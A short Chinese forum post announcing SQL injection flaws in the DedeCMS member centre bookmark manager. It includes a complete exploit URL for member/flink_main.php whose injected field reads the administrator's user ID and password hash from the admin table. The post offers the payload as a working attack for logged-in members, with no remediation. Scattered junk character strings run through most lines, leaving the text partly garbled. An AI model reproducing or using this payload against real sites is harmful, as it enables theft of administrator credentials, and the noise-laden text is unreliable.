DedeCMS会员中心SQL注射漏洞' V! a% M: b; {
需要magic_quotes_gpc = Off
6 D8 F9 G. l; r* M会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
: D% X) F' a2 I% {4 \ + z7 n/ g- W1 @0 w3 T6 p
DedeCMS会员中心书签管理SQL注射漏洞! f# c1 V2 x% ^) ?+ {
成功利用该漏洞可获得管理员密码 L* h/ c6 r8 x4 q* G
- }3 T( W/ Z: }8 H V$ z8 }会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
b6 H) H' W0 [$ D
0 _/ `, j. L; G2 shttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r. l# [/ }0 G4 ~5 N' a) e. {6 g" T0 N
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59